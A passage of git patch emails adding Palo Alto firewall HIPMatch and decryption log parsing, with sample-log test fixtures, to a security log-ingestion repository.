"VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe", + "jdoe@example.org" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "example.org", + "email": "jdoe@example.org", + "name": "jdoe" + } + } +} From 3aa5e742b94a0c9afa7f7572496254a95354dffd Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:23:49 +0100 Subject: [PATCH 071/150] fix(PaloAlto): extract host id and rule name for HIPMatch --- Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 4 ++-- .../paloalto-ngfw/tests/globalprotect_csv.json | 1 + .../paloalto-ngfw/tests/globalprotect_csv_2.json | 1 + .../paloalto-ngfw/tests/test_globalprotect.json | 1 + .../paloalto-ngfw/tests/test_hipmatch_json.json | 6 +++++- .../paloalto-ngfw/tests/test_new_globalprotect.json | 1 + 6 files changed, 11 insertions(+), 3 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index b7ec21cac..ba7fd4535 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -592,7 +592,7 @@ stages: event.module: "{{parsed_description.message.module}}" host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}" host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost or parsed_description.message.hostname}}" - host.id: "{{parsed_event.message.deviceExternalId}}" + host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}" host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}" host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}" host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}" @@ -617,7 +617,7 @@ stages: observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}" observer.serial_number: "{{parsed_event.message.DeviceSN}}" observer.name: "{{parsed_event.message.DeviceName}}" - rule.name: "{{parsed_event.message.Rule}}" + rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}" rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}" source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json index 65f2b6940..127226ee3 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee", "name": "AAAABBBBB", "os": { "version": "Microsoft Windows 10 Pro , 64-bit" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json index e4b1d5fab..1d68c400c 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3", "name": "2021-02707", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json index f08a677ef..8eac8428d 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json index 952e819e2..b0b294778 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json @@ -24,6 +24,7 @@ "type": "hipmatch" }, "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", "name": "DESKTOP-01" }, "log": { @@ -56,6 +57,9 @@ "jdoe@example.org" ] }, + "rule": { + "name": "VPN Compliant" + }, "source": { "address": "1.2.3.4", "ip": "1.2.3.4", @@ -69,4 +73,4 @@ "name": "jdoe" } } -} +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json index 25db7ff0a..c0622d09c 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json @@ -25,6 +25,7 @@ "type": "globalprotect" }, "host": { + "id": "e4f14dfd-bd3c-40e5-9c4e", "name": "LNL-test" }, "log": { From 45faefddb4854625e6a8c01fda4a52418f4a62f1 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:27:19 +0100 Subject: [PATCH 072/150] fix(PaloAlto): add support for HipMatch dsv events --- .../paloalto-ngfw/ingest/parser.yml | 43 +++++++++++ .../tests/test_hipmatch_csv.json | 73 +++++++++++++++++++ 2 files changed, 116 insertions(+) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index ba7fd4535..ea07e1d10 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -382,6 +382,49 @@ pipeline: - HighResolutionTimestamp delimiter: "," + # HIPMATCH CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceUser + - VirtualLocation + - MachineName + - EndpointOSType + - SourceAddress + - HipMatchName + - RepeatCount + - HIPMatchType + - FUTURE_USE + - FUTURE_USE + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - SourceIPv6 + - HostID + - EndpointSerialNumber + - SourceDeviceMac + - HighResolutionTimestamp + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json new file mode 100644 index 000000000..d32952899 --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json @@ -0,0 +1,73 @@ +{ + "input": { + "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From caa9e0ca8bb19e04ea9ebec30f3419cf3190ce53 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 19:02:45 +0100 Subject: [PATCH 073/150] fix(PaloAlto): improve support for decryption events --- .../paloalto-ngfw/_meta/fields.yml | 17 ++- .../paloalto-ngfw/ingest/parser.yml | 10 ++ .../tests/test_decryption_json.json | 118 ++++++++++++++++++ 3 files changed, 144 insertions(+), 1 deletion(-) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json diff --git a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml index e42125a42..4b07b6065 100644 --- a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml +++ b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml @@ -318,7 +318,22 @@ paloalto.threat.type: name: paloalto.threat.type type: keyword +paloalto.tls.chain_status: + description: The trust in the TLS chain + name: paloalto.tls.chain_status + type: keyword + +paloalto.tls.root_status: + description: The trust in the root certificate + name: paloalto.tls.root_status + type: keyword + +paloalto.tls.sni: + description: The server name indication + name: paloalto.tls.sni + type: keyword + paloalto.vsys: - description: The virtual system + description: the virtual system name: paloalto.vsys type: keyword diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index ea07e1d10..c4abfd388 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -651,6 +651,13 @@ stages: network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}" network.protocol: "{{parsed_description.message.proto}}" network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}" + tls.version: "{{parsed_event.message.TLSVersion[3:]}}" + tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}" + tls.curve: "{{parsed_event.message.EllipticCurve}}" + tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}" + tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}" + tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}" + tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}" observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}" observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}" observer.ingress.interface.name: "{{parsed_description.message.intf}}" @@ -795,6 +802,9 @@ stages: paloalto.vsys: "{{parsed_description.message.vsys}}" paloalto.authetification.profile: "{{parsed_description.message.auth_profile}}" paloalto.server.profile: "{{parsed_description.message.server_profile}}" + paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}" + paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}" + paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}" - set: paloalto.threat.type: > {%- set id = parsed_threat.message.threat_code | int -%} diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json new file mode 100644 index 000000000..bef30109a --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json @@ -0,0 +1,118 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": "eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "example", + "name": "jdoe" + } + } +} \ No newline at end of file From c3dd2fd72690727297bbc75a2af3654af6dac91c Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 19:03:17 +0100 Subject: [PATCH 074/150] fix(PaloAlto): add support for DSV Decryption events --- .../paloalto-ngfw/ingest/parser.yml | 118 ++++++++++++++++++ .../tests/test_decryption_csv.json | 98 +++++++++++++++ 2 files changed, 216 insertions(+) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index c4abfd388..944713355 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -425,6 +425,124 @@ pipeline: - ClusterName delimiter: "," + # DECRYPTION CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceAddress + - DestinationAddress + - NATSourceIP + - NATDestinationIP + - Rule + - SourceUser + - DestinationUser + - Application + - VirtualLocation + - SourceZone + - DestinationZone + - InboundInterface + - OutboundInterface + - LogAction + - TimeLogged + - SessionID + - RepeatCount + - SourcePort + - DestinationPort + - NATSourcePort + - NATDestinationPort + - Flags + - IPProtocol + - Action + - Tunnel + - FUTURE_USE + - FUTURE_USE + - SourceVMUUID + - DestinationVMUUID + - UUIDforrule + - StageforClienttoFirewall + - StageforFirewalltoServer + - TLSVersion + - TLSKeyExchange + - TLSEncryptionAlgorithm + - TLS_AUTH + - PolicyName + - EllipticCurve + - ErrorIndex + - RootStatus + - ChainStatus + - ProxyType + - CertificateSerialNumber + - Fingerprint + - CertificateStartDate + - CertificateEndDate + - CertificateVersion + - CertificateSize + - CommonNameLength + - IssuerCommonNameLength + - RootCommonNameLength + - SNILength + - CertificateFlags + - SubjectCommonName + - IssuerSubjectCommonName + - RootSubjectCommonName + - ServerNameIndication + - Error + - ContainerID + - PODNamespace + - PODName + - SourceExternalDynamicList + - DestinationExternalDynamicList + - SourceDynamicAddressGroup + - DestinationDynamicAddressGroup + - HighResTimestamp + - SourceDeviceCategory + - SourceDeviceProfile + - SourceDeviceModel + - SourceDeviceVendor + - SourceDeviceOSFamily + - SourceDeviceOSVersion + - SourceHostname + - SourceMACAddress + - DestinationDeviceCategory + - DestinationDeviceProfile + - DestinationDeviceModel + - DestinationDeviceVendor + - DestinationDeviceOSFamily + - DestinationDeviceOSVersion + - DestinationHostname + - DestinationMACAddress + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - ApplicationSubcategory + - ApplicationCategory + - ApplicationTechnology + - ApplicationRisk + - ApplicationCharacteristic + - ApplicationContainer + - ApplicationSaaS + - ApplicationSanctionedState + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json new file mode 100644 index 000000000..6a413f53b --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json @@ -0,0 +1,98 @@ +{ + "input": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From 84cf60f3488d4312a1f07df55bbcd5eae87e2e30 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:14:17 +0100 Subject: [PATCH 075/150] fix(GateWatcher): lint taxonomy --- GateWatcher/aioniq/_meta/fields.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index 07bae26e7..8bc01d294 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml @@ -389,16 +389,16 @@ gatewatcher.tls: name: gatewatcher.tls type: text -gatewatcher.tls_sni: - description: This field represents the TLS SNI field in a TLS metadata - name: gatewatcher.tls_sni - type: text - gatewatcher.tls_fingerprint: description: This field represents the TLS server fingerprint field in a TLS metadata name: gatewatcher.tls_fingerprint type: text +gatewatcher.tls_sni: + description: This field represents the TLS SNI field in a TLS metadata + name: gatewatcher.tls_sni + type: text + gatewatcher.ttp: description: This field is used for retrohunt alerts name: gatewatcher.ttp From 941d5826e98ca34ac5c66d22b6e2235eafbdf8b6 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:28:16 +0100 